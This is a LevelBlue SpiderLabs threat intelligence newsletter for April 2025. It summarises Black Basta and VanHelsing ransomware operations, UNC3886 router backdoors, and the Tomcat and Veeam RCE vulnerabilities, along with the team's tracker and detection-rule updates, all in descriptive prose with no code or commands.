Threat Intelligence News from LevelBlue SpiderLabs April 2025
April 2025
Latest Threat Intelligence News
Black Basta RaaS: Latest TTPs
Two blogs were published this month regarding Black Basta's TTPs.
The first blog, written by TrendMicro, discusses how the Black Basta and Cactus ransomware groups are leveraging BackConnect malware. Both groups gained initial access through a multi-stage social engineering attack. First, a flood of phishing emails posing as IT helpdesk were sent to the victims. They were then contacted through Microsoft Teams and persuaded to provide Quick Assist access, allowing the attacker to gain remote access into the victims’ systems. Finally, BackConnect malware was installed in the system to maintain persistent control and exfiltrate sensitive data from the compromised machines.
The second blog by EclecticIQ analyzed the internal chat logs of Black Basta RaaS leaked in February of 2025. The analysis concluded that the ransomware group was targeting vulnerable or weakly configured edge network devices to gain an initial foothold in the network. This was accomplished through a previously unknown brute forcing framework named BRUTED. This framework enables Black Basta affiliates to automate and scale these attacks, expanding their victim pool and accelerating monetization to drive ransomware operations.
VanHelsing: New RaaS
Checkpoint published a new blog reporting on a new RaaS named VanHelsing. Since the new service launched on March 7, 2025, Check Point has already identified two malware samples targeting Windows, and three different victims. The ransomware group doesn’t appear to target a specific operating system, as they claim to also target Linux, BSD, ARM and ESXi. The RaaS allows affiliates to participate in their activities after a $5,000 deposit. The only rule is to not target the Commonwealth of Independent States (CIS).
UNC3886 Targets Juniper Routers
Mandiant published a blog that deep dives into China-nexus espionage group UNC3886’s operation targeting Juniper Routers. The campaign was first identified by Mandiant in mid-2024, uncovering several backdoors built upon a basic TINYSHELL implementation for FreeBSD. These backdoors were heavily customized with unique capabilities as reported by Mandiant.
The victims were running End of Life hardware and software, but Juniper released a new image of the software in order to run a malware removal tool.
Apache Tomcat RCE (CVE-2025-24813)
CVE-2025-24813 is a critical path equivalence vulnerability in Apache Tomcat. Attackers could view or modify files as long as they knew the filenames. Recorded Future reported over 378,000 exposed endpoints as per their Shodan research. In certain scenarios, the vulnerability could lead to a Remote Code Execution (RCE). The conditions for the RCE are strict and significantly reduce the number of exposed devices vulnerable to it. Exploitation attempts by threat actors have been observed in the wild, as reported by Recorded Future.
Veeam Backup RCE (CVE-2025-23120)
Backup and recovery software provider Veeam published a security advisory on March 19, alerting on a critical RCE vulnerability (CVE-2025-23120). The vulnerability affects backup & replication systems that are domain joined.
No public Proof of Concept has been published, but Watchtowr has released technical details around the vulnerability and its similarities with the older CVE-2024-40711, which eases the path to an exploit.
Tracking, Detection & Hunting Capabilities
LevelBlue SpiderLabs has created the following Adversary Trackers to automatically identify and detect malicious infrastructure:
- GhostSock: This Golang-based SOCKS5 proxy malware has collaboration agreements with Lumma Infostealer to provide discounts to both of their customers.
- Kongtuke: This JavaScript downloader, previously known for its fake browser update to trick users into downloading their payloads, has recently been observed delivering fake “verify you are human” captchas that lead to the execution of malicious PowerShell scripts.
The following Adversary Trackers have also been updated during the month of March:
-
Amadey
-
RaccoonO365
-
Brute Ratel
-
Mamba2FA
-
Mythic
The team has identified the following malware/threat actors as the most active during the month of March:
-
SocGholish: continues to be the most relevant malware observed by LevelBlue SpiderLabs, mainly due to the amount of compromised websites and how frequently they are accessed. In addition to their usual activities, TrendMicro has reported this month on SocGholish being a key enabler in deploying RansomHub ransomware through compromised websites.
The LevelBlue trackers have identified over 2000 new IOCs for the different families it tracks. The busiest trackers during the month of March have been:
USM Anywhere Detection Improvements
In March, LevelBlue SpiderLabs added or updated 109 USM Anywhere detections. Here are a few examples of improvements and new elements LevelBlue SpiderLabs developed:
-
A major refresh of the CrowdStrike ruleset with updates and additions to 46 detections. Includes updates to malware, ransomware and malicious documents rules, to specific techniques regarding persistence, evasion, and communications with C&C.
-
Improvements to the ESET ruleset to improve the displayed descriptions.
-
Detections for IT tools being used for malicious purposes, such as: Rsync for Shell Execution, PowerShell reverse SSH Tunnels and NTLM Relay attacks with Certipy.
Please visit the LevelBlue Success Center for a full list of improvements, new elements, issues found, and tasks created.
LevelBlue SpiderLabs Open Threat Exchange
LevelBlue SpiderLabs Open Threat Exchange (OTX) is among the world’s largest open threat intelligence sharing communities, made up of 450,000 threat researchers from 140 countries globally who publish threat information to the platform daily. LevelBlue SpiderLabs validates, analyzes, and enriches this threat intelligence. Members of OTX benefit from the collective research, can contribute to the community, analyze threats, create public and private threat intelligence sharing groups, and more.
Learn more about OTX, its benefits, and how you can join here
New OTX Pulses
The LevelBlue SpiderLabs team is continuously publishing new pulses in OTX based on their research and discoveries. Pulses are interactive and researchable repositories of information about threats, threat actors, campaigns, and more. This includes indicators of compromise, IoCs, that are useful to members.
In March, 117 new Pulses were created by the SpiderLabs team, providing coverage for the latest threats and campaigns. Here are a few examples of the most relevant new Pulses: